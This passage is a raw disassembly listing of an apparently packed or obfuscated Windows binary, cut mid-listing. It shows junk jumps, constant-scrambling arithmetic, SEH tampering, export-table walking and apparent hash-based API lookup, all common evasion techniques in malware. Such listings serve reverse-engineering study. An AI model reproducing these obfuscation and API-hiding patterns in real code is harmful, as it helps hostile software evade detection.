; FUNCTION CHUNK AT 00422D86 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00423674 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423E0F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004243BF SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004245E3 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00424A42 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424C9D SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042535F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426485 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042668B SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042669A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004268AF SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004269CB SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00427124 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042715B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004273E6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427DAC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004280FB SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00428C36 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042910E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042912F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00429493 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0042A6A8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AC87 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B647 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042B7E4 SIZE 0000000B BYTES
mov [esp+0], edx
pop edx
xchg ecx, [esp-4+arg_0]
mov edx, ecx
pop ecx
jmp loc_4245E3
sub_42169F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4238D1
loc_4216AE: ; CODE XREF: sub_4238D1+7468�j
; DATA XREF: sub_425983+2273�o
mov ecx, [ebx+ecx+0Ch]
push offset sub_42AC2D
jmp nullsub_216
; END OF FUNCTION CHUNK FOR sub_4238D1
; ---------------------------------------------------------------------------
loc_4216BC: ; DATA XREF: _94j21ax3:004293A1�o
add ecx, 0CA7635EFh
xchg ecx, [esp]
jmp sub_42463C
; ---------------------------------------------------------------------------
loc_4216CA: ; CODE XREF: _94j21ax3:00426D28�j
jnb loc_421B64
; =============== S U B R O U T I N E =======================================
sub_4216D0 proc near ; CODE XREF: sub_428A90+9�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042116C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042137A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042366E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423E2E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429118 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C51A SIZE 00000017 BYTES
xchg ebx, [esp+0]
pop ebx
xor edx, ebp
rol edx, 5
jmp loc_429118
sub_4216D0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421013
loc_4216DE: ; CODE XREF: sub_421013:loc_429645�j
mov [ebp-4], eax
call sub_42BD03
loc_4216E6: ; CODE XREF: sub_427D65-5F04�j
jmp loc_424B0B
; END OF FUNCTION CHUNK FOR sub_421013
; ---------------------------------------------------------------------------
loc_4216EB: ; CODE XREF: _94j21ax3:loc_424369�j
mov ds:dword_422264, eax
push 0
jmp loc_426CB3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_4216F7: ; CODE XREF: sub_423324:loc_421933�j
call sub_42C057
test al, al
jz loc_423950
call sub_422973
lea eax, sub_42131B
jmp loc_429032
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421689
loc_421714: ; CODE XREF: sub_421689+520C�j
sbb edi, ebp
loc_421716: ; CODE XREF: sub_421689:loc_4232EA�j
mov eax, [ebp-4]
mov eax, [eax]
and eax, 0FFFFFFh
cmp eax, 0C3C033h
jnz loc_421D09
jmp loc_427C30
; END OF FUNCTION CHUNK FOR sub_421689
; ---------------------------------------------------------------------------
loc_421730: ; CODE XREF: _94j21ax3:00423B45�j
jz loc_42AB85
jmp loc_42479D
; ---------------------------------------------------------------------------
loc_42173B: ; DATA XREF: sub_421DC4+6B56�o
test eax, eax
jl loc_423F37
inc eax
mov [ebp-24h], eax
jmp loc_42BBEF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4250F7
loc_42174C: ; CODE XREF: sub_4250F7+4C54�j
; sub_4250F7:loc_429DDC�j
call sub_42574E
mov edx, 0CB804A30h
call sub_4239A5
push eax
ror eax, 0Bh
mov ds:dword_42C4A8, eax
jmp loc_428264
; END OF FUNCTION CHUNK FOR sub_4250F7
; ---------------------------------------------------------------------------
loc_42176A: ; CODE XREF: _94j21ax3:loc_42A224�j
mov ebp, esp
push offset sub_424627
jmp locret_42C130
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_421776: ; CODE XREF: sub_42284F:loc_424354�j
; _94j21ax3:0042437D�j
add eax, 2AEB07F5h
add eax, ebp
call sub_428811
; END OF FUNCTION CHUNK FOR sub_42284F
; START OF FUNCTION CHUNK FOR sub_4226AE
loc_421783: ; CODE XREF: sub_4226AE+13�j
jmp loc_42AF53
; END OF FUNCTION CHUNK FOR sub_4226AE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_94. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42266A
loc_421789: ; CODE XREF: sub_42266A+50F�j
jmp loc_428E3E
; END OF FUNCTION CHUNK FOR sub_42266A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AE
loc_42178F: ; CODE XREF: sub_42C1AE-12E0�j
jmp loc_4210EF
; END OF FUNCTION CHUNK FOR sub_42C1AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B78
loc_421794: ; CODE XREF: sub_423B78-97C�j
jmp loc_424DDC
; END OF FUNCTION CHUNK FOR sub_423B78
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421799 proc near ; CODE XREF: sub_421ABD+12�p
; sub_422DF2:loc_42A104�p
push ebp
mov ebp, esp
jmp sub_4236E2
sub_421799 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_124. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422973
loc_4217A2: ; CODE XREF: sub_422973+91BB�j
jmp loc_428F91
; END OF FUNCTION CHUNK FOR sub_422973
; ---------------------------------------------------------------------------
locret_4217A7: ; CODE XREF: _94j21ax3:loc_426A44�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424C37
loc_4217A8: ; CODE XREF: sub_424C37+3AA0�j
jmp loc_423166
; END OF FUNCTION CHUNK FOR sub_424C37
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421F28
loc_4217AD: ; CODE XREF: sub_421F28+275F�j
jmp loc_4285BA
; END OF FUNCTION CHUNK FOR sub_421F28
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B358
loc_4217B2: ; CODE XREF: sub_42B358:loc_4295C0�j
push 0E4062947h
pop edi
rol edi, 5
xor edi, 2BC80E9Eh
js loc_422C52
push edx
jmp loc_422C4D
; END OF FUNCTION CHUNK FOR sub_42B358
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424627
loc_4217CD: ; CODE XREF: _94j21ax3:loc_422E2F�j
; sub_424627+4C54�j
pop ebx
mov ecx, offset sub_4217DC
xchg ecx, [esp-4+arg_0]
retn
; END OF FUNCTION CHUNK FOR sub_424627
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A7A6
loc_4217D7: ; CODE XREF: sub_42A7A6-6F24�j
jmp loc_422420
; END OF FUNCTION CHUNK FOR sub_42A7A6
; =============== S U B R O U T I N E =======================================
sub_4217DC proc near ; DATA XREF: sub_424627-2E59�o
pop eax
pop ebp
jmp loc_426485
sub_4217DC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pushf
mov [esp], ebp
jmp loc_42184D
; ---------------------------------------------------------------------------
and esi, edx
jmp sub_4251F2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_4217F3: ; CODE XREF: sub_42C0BC:loc_425522�j
mov eax, large fs:20h
or eax, eax
jz loc_42A403
jmp loc_42C163
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
cmp ecx, 0D87DDF0Dh
jmp loc_429729
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_421812: ; CODE XREF: sub_423324:loc_423385�j
xchg edx, eax
js loc_42A434
push ecx
test edx, ebp
jmp loc_421CFE
; END OF FUNCTION CHUNK FOR sub_423324
; =============== S U B R O U T I N E =======================================
sub_421822 proc near ; CODE XREF: _94j21ax3:00426BE4�j
; _94j21ax3:004270E0�p
; FUNCTION CHUNK AT 00423ED1 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00427F34 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042B8AB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C02B SIZE 00000007 BYTES
xchg edx, [esp+0]
pop edx
or eax, eax
jnz loc_42B826
jmp loc_42B8AB
sub_421822 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
popf
mov eax, edx
jmp sub_42BDF4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_42183B: ; CODE XREF: sub_42B9CF-91CB�j
; sub_42B9CF:loc_425878�j ...
push edx
push 0B5B36346h
pop edx
sub edx, 3344F9EFh
jmp loc_42C4B1
; END OF FUNCTION CHUNK FOR sub_42B9CF
; ---------------------------------------------------------------------------
loc_42184D: ; CODE XREF: _94j21ax3:004217E7�j
mov ebp, esp
push offset loc_42B699
jmp loc_425ACB
; ---------------------------------------------------------------------------
locret_421859: ; CODE XREF: _94j21ax3:0042725B�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4259BF
loc_42185A: ; CODE XREF: sub_4259BF+4FE1�j
add dword ptr [esp+0], 9C6D6C5Dh
call sub_42A61F
push ebx
mov [esp+4+var_4], eax
call dword ptr [ebp-4]
jmp loc_42866A
; END OF FUNCTION CHUNK FOR sub_4259BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428A90
loc_421872: ; CODE XREF: sub_428A90:loc_428A9E�j
add edi, eax
loc_421874: ; CODE XREF: sub_421D33:loc_42C560�j
pop eax
mov [edi], eax
pop edi
push offset loc_427243
jmp nullsub_60
; END OF FUNCTION CHUNK FOR sub_428A90
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421F28
loc_421882: ; CODE XREF: sub_421F28+25C4�j
sub eax, 0FBF9FB9Dh
xor eax, 0A57B653Ch
add eax, ebp
add eax, 698C83B4h
call sub_4288EE
; END OF FUNCTION CHUNK FOR sub_421F28
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_30. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D53
loc_42189C: ; CODE XREF: sub_427D53+D�j
jmp loc_42ABE1
; END OF FUNCTION CHUNK FOR sub_427D53
; ---------------------------------------------------------------------------
or edi, 3925B78Fh
cmp ebp, 0A1699B80h
jmp loc_426D9E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_20. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_4218B3: ; CODE XREF: sub_42B314-75CC�j
; sub_422EB0:loc_427636�j
jno loc_42C116
jmp loc_4299AB
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_4218BE: ; CODE XREF: sub_4294B3:loc_425077�j
cmp dword ptr [ebp-4], 2
jnz loc_4299AB
lea eax, [ebp-26Fh]
jmp loc_42958A
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_4218D3: ; CODE XREF: sub_422EB0+8B1A�j
jz loc_426A00
jmp loc_4295E8
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_4218DE: ; CODE XREF: sub_4294B3:loc_422823�j
jnz loc_425077
jmp loc_42BACD
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
loc_4218E9: ; CODE XREF: _94j21ax3:0042A1D1�j
test ecx, edx
jmp loc_42755F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421644
loc_4218F0: ; CODE XREF: sub_421644+D�j
sub [esp+8+var_8], 24046235h
push 0
call sub_42446B
push eax
mov eax, esp
loc_421901: ; CODE XREF: _94j21ax3:loc_424F89�j
push offset loc_427B14
jmp loc_425600
; END OF FUNCTION CHUNK FOR sub_421644
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42983E
loc_42190B: ; CODE XREF: sub_42983E-5DA1�j
jnp loc_428E2D
add ebp, ebx
loc_421913: ; CODE XREF: sub_4248E7:loc_42B793�j
push ecx
push 426D4F71h
pop ecx
jmp loc_428BD9
; END OF FUNCTION CHUNK FOR sub_42983E
; =============== S U B R O U T I N E =======================================
sub_42191F proc near ; CODE XREF: sub_421CAA:loc_4280CE�p
; FUNCTION CHUNK AT 00427DBF SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042BC50 SIZE 00000011 BYTES
call sub_423F7F
loc_421924: ; CODE XREF: sub_42426B+3FEE�j
jmp loc_427DBF
sub_42191F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A389
loc_421929: ; CODE XREF: sub_42A389-5976�j
jmp locret_423384
; END OF FUNCTION CHUNK FOR sub_42A389
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421DC4
loc_42192E: ; CODE XREF: sub_421DC4+3D3�j
jmp loc_42A12D
; END OF FUNCTION CHUNK FOR sub_421DC4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_421933: ; CODE XREF: sub_42C5E8-B45E�j
; sub_4294B3-2BD3�j ...
jno loc_4216F7
call sub_42C057
test al, al
jz loc_423950
jmp loc_4257B7
; END OF FUNCTION CHUNK FOR sub_423324
; =============== S U B R O U T I N E =======================================
sub_42194B proc near ; CODE XREF: sub_42A7A6-F6�p
; _94j21ax3:0042B800�j
mov [esp+0], edi
pop edi
mov eax, [ebp-8]
push offset loc_4215F5
jmp nullsub_13
sub_42194B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42195C: ; CODE XREF: sub_423FCD-12C1�j
push offset sub_4269DD
jmp loc_42275F
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
loc_421966: ; CODE XREF: _94j21ax3:00422702�j
jle loc_424905
; =============== S U B R O U T I N E =======================================
sub_42196C proc near ; CODE XREF: sub_428B74+9�p
xchg ecx, [esp+0]
pop ecx
push 7CDEE58Bh
mov [esp+0], ecx
mov esp, ebp
pop ebp
jmp loc_421A5E
sub_42196C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422790
loc_421980: ; CODE XREF: sub_422790:loc_42AB2B�j
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
test byte ptr [eax-7], 10h
jz loc_42B8D6
jmp loc_421A79
; END OF FUNCTION CHUNK FOR sub_422790
; ---------------------------------------------------------------------------
db 5Ah, 0F0h, 6Dh
dword_421998 dd 80D1DF75h ; DATA XREF: sub_428B5E�r sub_429D05+3�w
dword_42199C dd 0EB03C3BEh ; DATA XREF: _94j21ax3:loc_42BBBD�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_4219A0: ; CODE XREF: sub_42284F+695B�j
jmp loc_42B601
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428811
loc_4219A5: ; CODE XREF: sub_428811+18�j
jmp nullsub_58
; END OF FUNCTION CHUNK FOR sub_428811
; ---------------------------------------------------------------------------
dw 16Fh
dword_4219AC dd 0C144EFBAh ; DATA XREF: _94j21ax3:loc_429F1C�w
; sub_42AADB+5�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4246B9
loc_4219B0: ; CODE XREF: sub_4246B9+6F5E�j
jmp nullsub_222
; END OF FUNCTION CHUNK FOR sub_4246B9
; ---------------------------------------------------------------------------
db 1Ah, 55h, 5Eh
dword_4219B8 dd 0B0EFBACh ; DATA XREF: _94j21ax3:00429FFB�w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423284
loc_4219BC: ; CODE XREF: sub_423284+768�j
jmp nullsub_150
; END OF FUNCTION CHUNK FOR sub_423284
; ---------------------------------------------------------------------------
db 0D3h, 26h, 0E6h
dword_4219C4 dd 58061DF7h ; DATA XREF: sub_4231CD+7F70�w
; ---------------------------------------------------------------------------
push ebp
jmp loc_423D85
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424D8C
loc_4219CE: ; CODE XREF: sub_424D8C+F�j
push edi
push 0B85FE547h
pop edi
sub edi, 22F7BD46h
xor edi, 0B593B652h
jmp loc_423189
; END OF FUNCTION CHUNK FOR sub_424D8C
; ---------------------------------------------------------------------------
loc_4219E6: ; DATA XREF: sub_4291BC-7650�o
cmp eax, [ebp-8]
jnz loc_4223A0
mov eax, [ebp-14h]
mov eax, [eax+24h]
add eax, [ebp-4]
jmp loc_42C4C7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_4219FD: ; CODE XREF: sub_423324+10E0�j
add eax, 232B0CF4h
mov eax, [eax]
push eax
jmp loc_422080
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42134B
loc_421A0B: ; CODE XREF: sub_42134B+A34�j
mov dword ptr [eax], 646E6957h
jmp loc_424CC8
; END OF FUNCTION CHUNK FOR sub_42134B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427A68
loc_421A16: ; CODE XREF: sub_427A68-4AF9�j
; sub_427A68:loc_4246DF�j
call nullsub_6
retn
; END OF FUNCTION CHUNK FOR sub_427A68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_421A1C: ; CODE XREF: sub_42169F:loc_4269CB�j
call sub_42C057
test al, al
jz loc_42669A
jmp loc_42B7E4
; END OF FUNCTION CHUNK FOR sub_42169F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_421A2E: ; CODE XREF: sub_42C0BC-3F1C�j
ror ecx, 2
loc_421A31: ; CODE XREF: sub_42C0BC:loc_427B09�j
pop large dword ptr fs:0
add esp, 4
mov eax, 50h
call sub_425A09
call sub_42C364
; END OF FUNCTION CHUNK FOR sub_42C0BC
; START OF FUNCTION CHUNK FOR sub_421EAD
loc_421A4A: ; CODE XREF: sub_421EAD+B�j
jmp nullsub_32
; END OF FUNCTION CHUNK FOR sub_421EAD
; =============== S U B R O U T I N E =======================================
sub_421A4F proc near ; CODE XREF: _94j21ax3:00422456�j
; sub_42773C:loc_4266EB�p
; FUNCTION CHUNK AT 00421362 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426412 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042AE45 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042B879 SIZE 00000005 BYTES
mov [esp+0], esi
pop esi
jnz loc_42AE45
loc_421A59: ; CODE XREF: _94j21ax3:loc_4287B9�j
call sub_428EBB
loc_421A5E: ; CODE XREF: sub_42196C+F�j
jmp loc_426412
sub_421A4F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_421A63: ; CODE XREF: sub_423324:loc_427EB3�j
; sub_423324+70B9�j
call sub_42574E
mov edx, 9E849D81h
call sub_4239A5
xchg eax, ebp
call sub_42237C
loc_421A79: ; CODE XREF: sub_422790-E00�j
jmp loc_42B8C2
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D65
loc_421A7E: ; CODE XREF: sub_427D65-3599�j
shl ecx, 18h
cdq
jmp loc_424298
; END OF FUNCTION CHUNK FOR sub_427D65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AC2D
loc_421A87: ; CODE XREF: sub_42AC2D:loc_42657A�j
jz loc_424940
cmp eax, 0FFFFFFFFh
call sub_42BC93
loc_421A95: ; CODE XREF: sub_42134B+88AC�j
jmp loc_423A7D
; END OF FUNCTION CHUNK FOR sub_42AC2D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA07
loc_421A9A: ; CODE XREF: sub_42AA07-7794�j
jmp nullsub_119
; END OF FUNCTION CHUNK FOR sub_42AA07
; =============== S U B R O U T I N E =======================================
sub_421A9F proc near ; DATA XREF: sub_426C2E+5�o
arg_C = dword ptr 10h
; FUNCTION CHUNK AT 00427C64 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C0A3 SIZE 00000004 BYTES
mov ecx, [esp+arg_C]
mov dword ptr [ecx], 10001h
lea eax, loc_42C0AC
mov [ecx+0B8h], eax
jmp loc_427C64
sub_421A9F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_421ABA: ; CODE XREF: _94j21ax3:00422BA1�j
rol edx, 12h
; =============== S U B R O U T I N E =======================================
sub_421ABD proc near ; CODE XREF: sub_428F65:loc_4256F8�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004291AF SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042A703 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B8B7 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
add eax, 0D3055A30h
add eax, ebp
add eax, 0D4851387h
call sub_421799
xchg ebp, [esp-4+arg_0]
jmp loc_42A703
sub_421ABD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421480
loc_421ADC: ; CODE XREF: sub_421480:loc_425267�j
rol edx, 5
call sub_428A90
loc_421AE4: ; CODE XREF: sub_422EB0:loc_42A592�j
jmp loc_4233B7
; END OF FUNCTION CHUNK FOR sub_421480
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422392
loc_421AE9: ; CODE XREF: sub_422392+7F02�j
jmp loc_4241A8
; END OF FUNCTION CHUNK FOR sub_422392
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423C51
loc_421AEE: ; CODE XREF: sub_423C51+F�j
jmp loc_427766
; END OF FUNCTION CHUNK FOR sub_423C51
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422764
loc_421AF3: ; CODE XREF: sub_422764:loc_429E6F�j
pop ebp
xor eax, eax
jmp loc_42AEAD
; END OF FUNCTION CHUNK FOR sub_422764
; ---------------------------------------------------------------------------
loc_421AFB: ; CODE XREF: _94j21ax3:loc_42A41B�j
add eax, 7D0h
mov [ebp-8], eax
push 2
push 0
push 0
lea eax, [ebp-4]
jmp loc_424763
; ---------------------------------------------------------------------------
loc_421B11: ; CODE XREF: _94j21ax3:0042793D�j
xor edi, edx
; START OF FUNCTION CHUNK FOR sub_423324
loc_421B13: ; CODE XREF: sub_423324:loc_429A4B�j
add ecx, 0A55F5E5Dh
xchg ecx, [esp+8+var_8]
jmp sub_429CAE
; END OF FUNCTION CHUNK FOR sub_423324
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_195. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428EDA
loc_421B22: ; CODE XREF: sub_428EDA:loc_428EE8�j
mov dword ptr [ecx], 10001h
lea eax, loc_42C0AC
mov [ecx+0B8h], eax
pop ecx
jmp loc_421F62
; END OF FUNCTION CHUNK FOR sub_428EDA
; =============== S U B R O U T I N E =======================================
sub_421B3A proc near ; CODE XREF: sub_423324+50�j
; _94j21ax3:00425299�p
; FUNCTION CHUNK AT 00427100 SIZE 00000003 BYTES
mov [esp+0], edi
pop edi
push ebx
mov [esp+0], eax
call sub_423505
loc_421B47: ; DATA XREF: sub_426985+4947�o
movzx eax, word ptr [eax]
shl eax, 2
mov edx, [ebp-14h]
mov edx, [edx+1Ch]
add edx, [ebp-4]
add eax, edx
mov eax, [eax]
add eax, [ebp-4]
jmp loc_427100
sub_421B3A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291BC
loc_421B62: ; CODE XREF: sub_4291BC+E�j
mov eax, [eax]
loc_421B64: ; CODE XREF: _94j21ax3:loc_4216CA�j
add eax, [ebp-4]
call sub_421EAD
push offset loc_4219E6
jmp loc_4296D1
; END OF FUNCTION CHUNK FOR sub_4291BC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_141. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_421B77: ; CODE XREF: sub_42284F+25F�j
jmp loc_422EC0
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
ror esi, 17h
jnp locret_4251A1
jmp sub_429550
; ---------------------------------------------------------------------------
and ecx, esi
jmp sub_42A4F4
; ---------------------------------------------------------------------------
mov [ecx], ebx
jmp loc_429F3D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_421B98: ; CODE XREF: sub_42284F:loc_42AF84�j
push edi
call sub_4221B8
; END OF FUNCTION CHUNK FOR sub_42284F
; START OF FUNCTION CHUNK FOR sub_424B01
loc_421B9E: ; CODE XREF: sub_424B01:loc_424B15�j
jmp loc_4299E5
; END OF FUNCTION CHUNK FOR sub_424B01
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_421BA3: ; CODE XREF: sub_422EB0+6403�j
mov edx, [edx+1Ch]
add edx, [ebp-4]
add eax, edx
mov eax, [eax]
add eax, [ebp-4]
call sub_4248E7
; END OF FUNCTION CHUNK FOR sub_422EB0
; START OF FUNCTION CHUNK FOR sub_4249A9
loc_421BB5: ; CODE XREF: sub_4249A9+68E�j
push eax
loc_421BB6: ; CODE XREF: sub_4249A9:loc_426DB5�j
lea eax, [ebp-24h]
call sub_422A20
; END OF FUNCTION CHUNK FOR sub_4249A9
; START OF FUNCTION CHUNK FOR sub_42771C
loc_421BBE: ; CODE XREF: sub_42771C+6�j
jmp loc_4231D7
; END OF FUNCTION CHUNK FOR sub_42771C
; ---------------------------------------------------------------------------
db 0Fh
dd 0E328Ah, 0A2B6E900h, 0E0810000h, 717A51Bh, 9C7DE9h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4259BF
loc_421BD9: ; CODE XREF: sub_4259BF-3246�j
push eax
xchg ebp, [esi]
jmp loc_4265F4
; END OF FUNCTION CHUNK FOR sub_4259BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425934
loc_421BE1: ; CODE XREF: sub_425934:loc_426BC9�j
; _94j21ax3:00426BDC�j
add eax, 38E91D29h
mov eax, [eax]
or eax, eax
jnz loc_42B144
jmp loc_427926
; END OF FUNCTION CHUNK FOR sub_425934
; =============== S U B R O U T I N E =======================================
sub_421BF6 proc near ; DATA XREF: sub_4272E9-46CF�o
var_4 = dword ptr -4
push edx
push 0C954C05Ah
pop edx
rol edx, 4
add edx, 6AB3FA54h
xchg edx, [esp+4+var_4]
push ecx
pushf
jmp loc_42852F
sub_421BF6 endp
; ---------------------------------------------------------------------------
push eax
ror eax, 0Eh
loc_421C14: ; CODE XREF: _94j21ax3:0042AC92�j
mov ds:dword_42C220, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A7FC
loc_421C1B: ; CODE XREF: sub_42A7FC+19�j
jmp loc_4287CE
; END OF FUNCTION CHUNK FOR sub_42A7FC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429CAE
loc_421C20: ; CODE XREF: sub_429CAE-6623�j
jmp loc_428F8C
; END OF FUNCTION CHUNK FOR sub_429CAE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42982D
loc_421C25: ; CODE XREF: sub_42982D:loc_424B49�j
rol eax, 0Eh
jmp loc_428313
; END OF FUNCTION CHUNK FOR sub_42982D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A7A6
loc_421C2D: ; CODE XREF: sub_42A7A6:loc_422F1E�j
jnz loc_423871
jmp loc_4220F0
; END OF FUNCTION CHUNK FOR sub_42A7A6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AE
